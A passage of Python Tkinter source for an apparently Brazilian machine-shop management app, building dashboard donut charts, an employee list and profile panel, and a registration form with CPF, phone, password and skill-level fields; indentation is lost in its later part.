    frameDetalhe1 = Frame(self.aba1, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
    frameDetalhe1.place(relx=0.010, rely=0.120, relwidth=0.450, relheight=0.400)
    def buscar_dados():
        # Animates the donut: canvas item 2 is the arc, item 4 the main
        # text (ids follow creation order below); reschedules itself
        # every 100 ms.
        a = C.itemcget(2, 'extent')
        a = float(a)
        b = int(a) - 1.0
        C.itemconfig(2, extent=b)  # advance the arc clockwise
        inteiro = int(b * (-1))  # degree value as a positive integer
        porc = str(round(((inteiro / 360) * 100),2))  # degrees -> percentage
        C.itemconfig(4, text=porc+'%')  # display the result
        frameDetalhe1.after(100, buscar_dados)
    C = Canvas(frameDetalhe1, bg="white")
    circle1 = 0, 0, 200, 200
    oval1 = C.create_oval(circle1, outline='#e6e6e6', fill="#e6e6e6")
    C.move(oval1, 10,10)
    coord = 0, 0, 200, 200
    arc = C.create_arc(coord, start=90, extent=0, outline='#45ccce', fill="#45ccce")
    C.move(arc, 10, 10)
    circle = 0, 0, 150, 150
    oval = C.create_oval(circle, outline='white', fill="white")
    C.move(oval, 35,35)
    textPrincipal = C.create_text(110, 110, font="Arial 22")
    textLabel = C.create_text(110, 110, text="Qtd Finalizada", font="Arial 12")
    C.move(textLabel, 270,-30)
    textTotal = C.create_text(110, 110, text="795", font="Arial 30", fill='#45ccce')
    C.move(textTotal, 270,10)
    textLabel2 = C.create_text(110, 110, text="Operações", font="Arial 12")
    C.move(textLabel2, 270, 40)
    C.place(relx=0.500, rely=0.500, anchor='center', relwidth=0.800, relheight=0.780)
    buscar_dados()
    # Informative labels for the finished-orders frame.
    corPadrao = self.janelaInicial['bg']
    # Frame with the "paused orders" donut chart.
    frameDetalhe2 = Frame(self.aba1, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
    frameDetalhe2.place(relx=0.520, rely=0.120, relwidth=0.450, relheight=0.400)
    def buscar_dados2():
        # Same animation as buscar_dados, driving the second canvas.
        a = C2.itemcget(2, 'extent')
        a = float(a)
        b = int(a) - 1.0
        C2.itemconfig(2, extent=b)  # advance the arc clockwise
        inteiro = int(b * (-1))  # degree value as a positive integer
        porc = str(round(((inteiro / 360) * 100),2))  # degrees -> percentage
        C2.itemconfig(4, text=porc+'%')  # display the result
        frameDetalhe2.after(100, buscar_dados2)
    C2 = Canvas(frameDetalhe2, bg="white")
    varCircle1 = 0, 0, 200, 200
    varOval1 = C2.create_oval(varCircle1, outline='#e6e6e6', fill="#e6e6e6")
    C2.move(varOval1, 10,10)
    coord = 0, 0, 200, 200
    varArc = C2.create_arc(coord, start=90, extent=0, outline='yellow', fill="yellow")
    C2.move(varArc, 10, 10)
    varCircle = 0, 0, 150, 150
    oval = C2.create_oval(varCircle, outline='white', fill="white")
    C2.move(oval, 35,35)
    varTextPrincipal = C2.create_text(110, 110, font="Arial 22")
    varTextLabel = C2.create_text(110, 110, text="Qtd Pausada", font="Arial 12")
    C2.move(varTextLabel, 270,-30)
    varTextTotal = C2.create_text(110, 110, text="795", font="Arial 30", fill="yellow")
    C2.move(varTextTotal, 270,10)
    varTextLabel2 = C2.create_text(110, 110, text="Operações", font="Arial 12")
    C2.move(varTextLabel2, 270, 40)
    C2.place(relx=0.500, rely=0.500, anchor='center', relwidth=0.800, relheight=0.780)
    buscar_dados2()
    # Treeview heading style (left disabled by the original author).
    #style = ttk.Style()
    #style.configure('Treeview.Heading', font=('arial', 9), foreground='#344f84')
    # Canvas with the operator-ranking bars (static placeholder data).
    C3 = Canvas(self.aba1, bg="white")
    textTitleC3 = C3.create_text(0, 0, text="Ranking de Operadores", font="Arial 10")
    C3.move(textTitleC3, 80,20)
    line1 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    x1 = 0
    y1 = 50
    C3.move(line1, x1,y1)
    # Position the "100%" label just past the right edge of the bar.
    tx = int(C3.coords(2)[2])
    textLabelC3 = C3.create_text(0, 0, text="100%", font="Arial 10")
    C3.move(textLabelC3, tx+x1+20,y1)
    line2 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line2, 0,80)
    line3 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line3, 0,110)
    line4 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line4, 0,140)
    line5 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line5, 0,170)
    line6 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line6, 0,200)
    line7 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
    C3.move(line7, 0,230)
    lineDiv = C3.create_line(0, 150, 0, 0, width=2, fill='#e6e6e6')
    C3.move(lineDiv, 370,70)
    textNome1 = C3.create_text(0, 0, text="Marcos", font="Arial 10")
    C3.move(textNome1,450,50)
    C3.place(relx=0.250, rely=0.700, anchor='center', relwidth=0.400, relheight=0.350)
def aba_funcionarios(self):
    """Build the "Funcionários" tab.

    Left frame: Treeview listing every employee (double-click / Enter
    opens the profile).  Right frame: the selected employee's photo,
    personal-data labels, OS counters and edit/delete/clear buttons.
    """
    global image
    # Frame 1: employee list.
    self.frameFuncionarios = Frame(self.aba2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    self.frameFuncionarios.place(relx=0.040, rely=0.040, relwidth=0.650, relheight=0.930)
    # Company logo; kept in a module global so Tk keeps the image alive.
    image = PhotoImage(file='image/logo-multimoldes.png')
    logo = Label(self.frameFuncionarios, image=image, bg='white')
    logo.pack()
    lb1 = Label(self.frameFuncionarios, text='Total Funci', font=('arial black', 11, 'bold'), fg='#4c78ff', bg='white')
    lb1.place(relx=0.010, rely=0.010)
    self.lbFunc = Label(self.frameFuncionarios, text='0', font=('arial black', 11, 'bold'), fg='green', bg='white')
    self.lbFunc.place(relx=0.140, rely=0.010)
    # Refresh the counter only when the database is reachable.
    if self.bancoConnect:
        self.atualiza_valores_funcionario()
    # Treeview that lists the employees.
    self.viewFuncionarios = ttk.Treeview(self.frameFuncionarios, column=('1','2','3','4'), show='headings')
    self.viewFuncionarios.heading('1', text='ID')
    self.viewFuncionarios.heading('2', text='Nome')
    self.viewFuncionarios.heading('3', text='Cargo')
    self.viewFuncionarios.heading('4', text='CPF')
    # NOTE(review): width=-90 mirrors the original; Tk treats negative
    # widths oddly — confirm the intended ID column width.
    self.viewFuncionarios.column("1", width=-90, anchor='n')
    self.viewFuncionarios.column("2", width=120, anchor='n')
    self.viewFuncionarios.column("3", width=30, anchor='n')
    self.viewFuncionarios.column("4", width=30, anchor='n')
    self.viewFuncionarios.place(relx=0.0, rely=0.300, relwidth=0.961, relheight=0.700)
    self.viewFuncionarios.bind('<Double -1>', self.exibir_perfil_funcionarios)
    self.viewFuncionarios.bind('<Return>', self.exibir_perfil_funcionarios)
    self.viewFuncionarios.bind("<Escape>", lambda event: self.remover_focus(event, self.viewFuncionarios))
    # Bug fix: the scrollbar must drive the Treeview's yview method —
    # the original passed the widget itself, leaving the scrollbar
    # inert (compare the working pattern in janela_exibir_pecas).
    scrollbar = Scrollbar(self.frameFuncionarios, orient="vertical", command=self.viewFuncionarios.yview)
    self.viewFuncionarios.configure(yscrollcommand=scrollbar.set)
    scrollbar.place(relx=0.960, rely=0.300, relwidth=0.040, relheight=0.700)
    # Populate the list with the registered employees.
    self.exibir_funcionarios('funcionarios')
    # Frame 2: selected employee's data.
    self.framePerfil = Frame(self.aba2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    self.framePerfil.place(relx=0.750, rely=0.040, relwidth=0.200, relheight=0.930)
    self.imgPerfil = PhotoImage(file='image/sem_perfil.png')
    self.lbPerfil = Label(self.framePerfil, image=self.imgPerfil, bg='white', relief=FLAT)
    self.lbPerfil.place(relx=0.320, rely=0.040)
    # Action buttons; images kept in module globals to survive GC.
    global imgEditar
    imgEditar = PhotoImage(file='image/editar.png')
    buttonEditar = Button(self.framePerfil, image=imgEditar, bg='white', relief=FLAT, border=0, activebackground='white', command=self.editar_perfil_funcionario)
    buttonEditar.place(relx=0.040, rely=0.070)
    global imgExcluir
    imgExcluir = PhotoImage(file='image/excluir.png')
    buttonExcluir = Button(self.framePerfil, image=imgExcluir, bg='white', relief=FLAT, border=0, activebackground='white', command=self.deletar_perfil_funcionario)
    buttonExcluir.place(relx=0.040, rely=0.135)
    global imgLimpar
    imgLimpar = PhotoImage(file='image/limpar2.png')
    buttonLimpar = Button(self.framePerfil, image=imgLimpar, bg='white', relief=FLAT, border=0, activebackground='white', command=self.limpar_perfil_funcionario)
    buttonLimpar.place(relx=0.040, rely=0.200)
    # Placeholder shown until a profile is selected.
    self.labelAviso = Label(self.framePerfil, text='''
Selecione um Perfil
para exibir
os seus Dados''', justify=CENTER, anchor='w', bg='white', font=('arial', 11))
    self.labelAviso.place(relx=0.150, rely=0.400)
    # Personal-data labels (placed elsewhere when a profile is shown).
    self.lNome = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
    self.lIdade = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
    self.lFone = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
    # Completed / pending service-order totals.
    self.l_OS_Con = Label(self.framePerfil, text='OS Concluídas', font=('arial black', 9), fg='#4c78ff', bg='white')
    self.l_OS_Pen = Label(self.framePerfil, text='OS Pendentes', font=('arial black', 9), fg='#4c78ff', bg='white')
    self.l_OS_Dados1 = Label(self.framePerfil, font=('arial black', 9), fg='green', bg='white')
    self.l_OS_Dados2 = Label(self.framePerfil, font=('arial black', 9), fg='red', bg='white')
    self.botVer = Button(self.framePerfil, text='Ver Habilidade', font=('arial black', 10), fg='white', bg='#4c78ff', border=1, relief=SOLID, command=self.exibir_habilidade)
def aba_cadastro(self):
#Frame de Login dos registros de conta do usuário
self.frameDadosLogin = Frame(self.aba3, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameDadosLogin.place(relx=0.100, rely=0.150, relwidth=0.800, relheight=0.270)
#Label de inserção de foto do Funcionário
self.imgSemPerfil = PhotoImage(file='image/sem_perfil.png')
self.foto = Label(self.frameDadosLogin, image=self.imgSemPerfil, width=150, height=150, bg='white')
self.foto.place(relx=0.830, rely=0.060)
self.arquivoIMG = 'image/sem_perfil.png'
def selecionar_imagem():
#Abrindo arquivo de imagem para foto de perfil
self.caminhoBackup = self.arquivoIMG
self.arquivoIMG = filedialog.askopenfilename(title='Selecione imagem de perfil', filetypes=(('Imagem PNG', '*.png'), ('All files', '*.*')))
#Se for zero nenhuma foto foi selecionada
if len(self.arquivoIMG) == 0:
#Tentando verificar se existe cookie de imagem
try:
self.foto['image'] = self.cookie
self.arquivoIMG = self.caminhoBackup
except: pass
return ''
#Armazenando a foto selecionada.
self.imgSelecionada = PhotoImage(file=self.arquivoIMG)
#Verificando se imagem não excede o comprimento máximo permitido
if self.imgSelecionada.width() > 150 or self.imgSelecionada.height() > 150:
return messagebox.showinfo('Tamanho não permitido', 'A imagem selecionada possui comprimento grande demais')
self.cookie = self.imgSelecionada
#Configurando Labels parar exibir imagem de selecionar e botão de editar
self.foto['image'] = self.imgSelecionada
self.imgAdd = PhotoImage(file='image/lapis.png')
self.add['image'] = self.imgAdd
self.add.place(relx=0.955, rely=0.700)
self.imgAdd = PhotoImage(file='image/abrir.png')
self.add = Button(self.frameDadosLogin, image=self.imgAdd, bg='white', relief=FLAT, activebackground='white', border=0, command=selecionar_imagem)
self.add.place(relx=0.890, rely=0.580)
#labels referente aos campos de login
self.lbDados = Label(self.frameDadosLogin, text='Dados', font=('arial black', 14), bg='white', fg='#4c78ff')
self.lbDados.place(relx=0.010, rely=0.010)
self.lbNome = Label(self.frameDadosLogin, text='Nome', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbCPF = Label(self.frameDadosLogin, text='CPF', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbFuncao = Label(self.frameDadosLogin, text='Função', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbFone = Label(self.frameDadosLogin, text='Fone', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbNasc = Label(self.frameDadosLogin, text='Data de Nasc.', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbSenha = Label(self.frameDadosLogin, text='Senha', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbSenhaErro = Label(self.frameDadosLogin, text='', font=('arial', 10, 'bold'), fg='red', bg='white')
self.lbConfirmaSenha = Label(self.frameDadosLogin, text='Confirme Senha', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbConfirmaSenhaErro = Label(self.frameDadosLogin, text='', font=('arial', 10, 'bold'), fg='red', bg='white')
self.lbNome.place(relx=0.020, rely=0.220)
self.lbCPF.place(relx=0.470, rely=0.220)
self.lbFuncao.place(relx=0.020, rely=0.450)
self.lbFone.place(relx=0.300, rely=0.450)
self.lbNasc.place(relx=0.570, rely=0.450)
self.lbSenha.place(relx=0.020, rely=0.700)
self.lbSenhaErro.place(relx=0.110, rely=0.750)
self.lbConfirmaSenha.place(relx=0.300, rely=0.700)
self.lbConfirmaSenhaErro.place(relx=0.440, rely=0.750)
#Função que impedirá que o usuário digite valores diferentes do que o campos propõe
def verifica_campo(*args):
value = strNome.get()
if len(value) > 0:
if value[-1].isnumeric():
strNome.set(value[:-1])
else:
strNome.set(value[:50])
value2 = nCPF.get()
if len(value2) > 0:
if not value2[-1].isnumeric():
nCPF.set(value2[:-1])
else:
nCPF.set(value2[:11])
value3 = nSenha.get()
if len(value3) > 0:
if not value3[-1].isnumeric():
nSenha.set(value3[:-1])
else:
nSenha.set(value3[0:8])
if len(value3) >= 8:
self.campoConfirmaSenha.configure(state=NORMAL)
else:
self.campoConfirmaSenha.configure(state=DISABLED)
else:
self.lbConfirmaSenhaErro['text'] = ''
self.campoConfirmaSenha.configure(state=DISABLED)
value4 = nConfirmaSenha.get()
if len(value4) > 0:
if len(value4) == 8 and value4 != value3:
self.lbConfirmaSenhaErro['text'] = 'As senhas não coincidem'
elif len(value4) == 8 and value4 == value3:
self.lbConfirmaSenhaErro['text'] = ''
if not value4[-1].isnumeric():
nConfirmaSenha.set(value4[:-1])
else:
nConfirmaSenha.set(value4[:8])
else:
self.lbConfirmaSenhaErro['text'] = ''
def format_campo_fone(*args):
mask = nFone.get()
nFone.set(mask[:15])
#Se houver 2 dígitos no campo, e eles forem númericos...
if len(mask) == 2 and mask.isnumeric():
#Delete todo o campo
self.campoFone.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoFone.insert(END,'('+mask+')')
#Se houver 9 dígitos no campo, e os últimos 4 forem númericos...
if len(mask) == 9 and mask[4:].isnumeric():
#Delete todo o campo
self.campoFone.delete(0, END)
#pegue os primeiros quatro dígitos e acrescente um espaço no final
a = mask[0:4]+' '
#com os primeiros dígitos acrescentado com o espaço, concatene com o resto
a = a+mask[4:]
#Devolvendo o valor ajustado para a variável principal
mask = a
#Insira no campo os números com a máscara pronta
self.campoFone.insert(END, mask+'-')
def format_campo_nasc(*args):
mask = nNasc.get()
nNasc.set(mask[:10])
#Se houver 2 dígitos no campo, e eles forem númericos...
if len(mask) == 2 and mask.isnumeric():
#Delete todo o campo
self.campoNasc.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoNasc.insert(END, mask+'/')
elif len(mask) == 5 and mask[3:].isnumeric():
#Delete todo o campo
self.campoNasc.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoNasc.insert(END, mask+'/')
#Variáveis que será utilizadas para verificação dos campos
strNome = StringVar()
strNome.trace('w', verifica_campo)
nCPF = StringVar()
nCPF.trace('w', verifica_campo)
nFone = StringVar()
nFone.trace('w', format_campo_fone)
nNasc = StringVar()
nNasc.trace('w', format_campo_nasc)
nSenha = StringVar()
nSenha.trace('w', verifica_campo)
nConfirmaSenha = StringVar()
nConfirmaSenha.trace('w', verifica_campo)
#Campos de preenchimento dos dados de login
self.campoNome = Entry(self.frameDadosLogin, font=('arial',12), textvariable=strNome, border=2, relief=GROOVE)
self.campoNome.focus_force()
self.campoCPF = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nCPF, border=2, relief=GROOVE)
self.campoFuncao = ttk.Combobox(self.frameDadosLogin, font=('arial',12), state='readonly')
self.campoFuncao['values'] = ('Selecione', 'Frezador', 'Soldador', 'Torneiro', 'Caldereiro', 'Tec. Usinagem', 'Operador CNC', 'Operador/Programador CNC', 'Tec. em Mecânica', 'Desenhista', 'Eletrotécnica')
self.campoFuncao.current(0)
self.campoFone = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nFone, border=2, relief=GROOVE)
self.campoNasc = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nNasc, border=2, relief=GROOVE)
self.campoSenha = Entry(self.frameDadosLogin, font=('arial',12), show='*', textvariable=nSenha, border=2, relief=GROOVE)
self.campoConfirmaSenha = Entry(self.frameDadosLogin, font=('arial',12), show='*', textvariable=nConfirmaSenha,state=DISABLED, border=2, relief=GROOVE)
self.campoNome.place(relx=0.080, rely=0.220, relwidth=0.350)
self.campoCPF.place(relx=0.518, rely=0.220, relwidth=0.175)
self.campoFuncao.place(relx=0.080, rely=0.450)
self.campoFone.place(relx=0.350, rely=0.450)
self.campoNasc.place(relx=0.680, rely=0.450, relwidth=0.130)
self.campoSenha.place(relx=0.085, rely=0.700, relwidth=0.175)
self.campoConfirmaSenha.place(relx=0.430, rely=0.700, relwidth=0.175)
def mostrar_senha():
if self.senhaVisible == False:
self.campoSenha['show'] = ''
self.campoConfirmaSenha['show'] = ''
self.senhaVisible = True
self.cadeado = PhotoImage(file='image/cadeado_aberto.png')
self.check['image'] = self.cadeado
else:
self.campoSenha['show'] = '*'
self.campoConfirmaSenha['show'] = '*'
self.senhaVisible = False
self.cadeado = PhotoImage(file='image/cadeado.png')
self.check['image'] = self.cadeado
self.senhaVisible = False
self.cadeado = PhotoImage(file='image/cadeado.png')
self.check = Button(self.frameDadosLogin, image=self.cadeado, bg='white', activebackground='white', border=0, command=mostrar_senha)
self.check.place(relx=0.620, rely=0.680)
#Frame de atribuição das habilidades dos funcionários
self.frameAtribuicao = Frame(self.aba3, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameAtribuicao.place(relx=0.100, rely=0.450, relwidth=0.800, relheight=0.430)
#labels referente aos campos de Atribuição
self.lbAtribuicao = Label(self.frameAtribuicao, text='Competência ', font=('arial black', 14), bg='white', fg='#4c78ff')
self.lbAtribuicao.place(relx=0.010, rely=0.010)
self.lbAtribuicao1 = Label(self.frameAtribuicao, text='Desenhar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao2 = Label(self.frameAtribuicao, text='Revisar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao3 = Label(self.frameAtribuicao, text='Serrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao4 = Label(self.frameAtribuicao, text='Furar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao5 = Label(self.frameAtribuicao, text='Estampar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao6 = Label(self.frameAtribuicao, text='Prensar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao7 = Label(self.frameAtribuicao, text='Rosquear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao8 = Label(self.frameAtribuicao, text='Tornear 1º', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao9 = Label(self.frameAtribuicao, text='Tornear 2º', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao10 = Label(self.frameAtribuicao, text='Tornear Única', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao11 = Label(self.frameAtribuicao, text='Fresar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao12 = Label(self.frameAtribuicao, text='Retificar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao13 = Label(self.frameAtribuicao, text='Erosão Penetração', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao14 = Label(self.frameAtribuicao, text='Erosão Fio', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao15 = Label(self.frameAtribuicao, text='Tratamento Térmico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao16 = Label(self.frameAtribuicao, text='Oxidação Negra', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao17 = Label(self.frameAtribuicao, text='Solda', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao18 = Label(self.frameAtribuicao, text='Solda Ponto', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao19 = Label(self.frameAtribuicao, text='Solda Indução', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao20 = Label(self.frameAtribuicao, text='Lixar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao21 = Label(self.frameAtribuicao, text='Esmerilhar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao22 = Label(self.frameAtribuicao, text='Jatear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao23 = Label(self.frameAtribuicao, text='Polir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao24 = Label(self.frameAtribuicao, text='Lavar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao25 = Label(self.frameAtribuicao, text='Embalar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao26 = Label(self.frameAtribuicao, text='Medir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao27 = Label(self.frameAtribuicao, text='Rebarbar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao28 = Label(self.frameAtribuicao, text='Rosquear Manualmente', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao29 = Label(self.frameAtribuicao, text='Pintar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao30 = Label(self.frameAtribuicao, text='Montar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao31 = Label(self.frameAtribuicao, text='Escarear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao32 = Label(self.frameAtribuicao, text='Afiar Ferramenta', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao33 = Label(self.frameAtribuicao, text='Dobrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao34 = Label(self.frameAtribuicao, text='Chanfrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao35 = Label(self.frameAtribuicao, text='Soldar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao36 = Label(self.frameAtribuicao, text='Cortar c/lixadeira', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao37 = Label(self.frameAtribuicao, text='Cortar c/maçarico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao38 = Label(self.frameAtribuicao, text='Aquecer com Maçarico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao39 = Label(self.frameAtribuicao, text='Temperar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao40 = Label(self.frameAtribuicao, text='Revenir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao41 = Label(self.frameAtribuicao, text='Desempenar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao1.place(relx=0.020, rely=0.130, relwidth=0.160)
self.lbAtribuicao2.place(relx=0.260, rely=0.130, relwidth=0.160)
self.lbAtribuicao3.place(relx=0.510, rely=0.130, relwidth=0.160)
self.lbAtribuicao4.place(relx=0.760, rely=0.130, relwidth=0.160)
self.lbAtribuicao5.place(relx=0.020, rely=0.210, relwidth=0.160)
self.lbAtribuicao6.place(relx=0.260, rely=0.210, relwidth=0.160)
self.lbAtribuicao7.place(relx=0.510, rely=0.210, relwidth=0.160)
self.lbAtribuicao8.place(relx=0.760, rely=0.210, relwidth=0.160)
self.lbAtribuicao9.place(relx=0.020, rely=0.290, relwidth=0.160)
self.lbAtribuicao10.place(relx=0.260, rely=0.290, relwidth=0.160)
self.lbAtribuicao11.place(relx=0.510, rely=0.290, relwidth=0.160)
self.lbAtribuicao12.place(relx=0.760, rely=0.290, relwidth=0.160)
self.lbAtribuicao13.place(relx=0.020, rely=0.370, relwidth=0.160)
self.lbAtribuicao14.place(relx=0.260, rely=0.370, relwidth=0.160)
self.lbAtribuicao15.place(relx=0.510, rely=0.370, relwidth=0.160)
self.lbAtribuicao16.place(relx=0.760, rely=0.370, relwidth=0.160)
self.lbAtribuicao17.place(relx=0.020, rely=0.450, relwidth=0.160)
self.lbAtribuicao18.place(relx=0.260, rely=0.450, relwidth=0.160)
self.lbAtribuicao19.place(relx=0.510, rely=0.450, relwidth=0.160)
self.lbAtribuicao20.place(relx=0.760, rely=0.450, relwidth=0.160)
self.lbAtribuicao21.place(relx=0.020, rely=0.530, relwidth=0.160)
self.lbAtribuicao22.place(relx=0.260, rely=0.530, relwidth=0.160)
self.lbAtribuicao23.place(relx=0.510, rely=0.530, relwidth=0.160)
self.lbAtribuicao24.place(relx=0.760, rely=0.530, relwidth=0.160)
self.lbAtribuicao25.place(relx=0.020, rely=0.610, relwidth=0.160)
self.lbAtribuicao26.place(relx=0.260, rely=0.610, relwidth=0.160)
self.lbAtribuicao27.place(relx=0.510, rely=0.610, relwidth=0.160)
self.lbAtribuicao28.place(relx=0.760, rely=0.610, relwidth=0.160)
self.lbAtribuicao29.place(relx=0.020, rely=0.690, relwidth=0.160)
self.lbAtribuicao30.place(relx=0.260, rely=0.690, relwidth=0.160)
self.lbAtribuicao31.place(relx=0.510, rely=0.690, relwidth=0.160)
self.lbAtribuicao32.place(relx=0.760, rely=0.690, relwidth=0.160)
self.lbAtribuicao33.place(relx=0.020, rely=0.770, relwidth=0.160)
self.lbAtribuicao34.place(relx=0.260, rely=0.770, relwidth=0.160)
self.lbAtribuicao35.place(relx=0.510, rely=0.770, relwidth=0.160)
self.lbAtribuicao36.place(relx=0.760, rely=0.770, relwidth=0.160)
self.lbAtribuicao37.place(relx=0.020, rely=0.850, relwidth=0.160)
self.lbAtribuicao38.place(relx=0.260, rely=0.850, relwidth=0.160)
self.lbAtribuicao39.place(relx=0.510, rely=0.850, relwidth=0.160)
self.lbAtribuicao40.place(relx=0.760, rely=0.850, relwidth=0.160)
self.lbAtribuicao41.place(relx=0.020, rely=0.930, relwidth=0.160)
#Boxes de seleção para o nível de habilidades do usuário em cada operação
self.box1 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box2 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box3 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box4 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box5 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box6 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box7 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box8 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box9 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box10 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box11 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box12 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box13 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box14 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box15 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box16 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box17 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box18 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box19 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box20 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
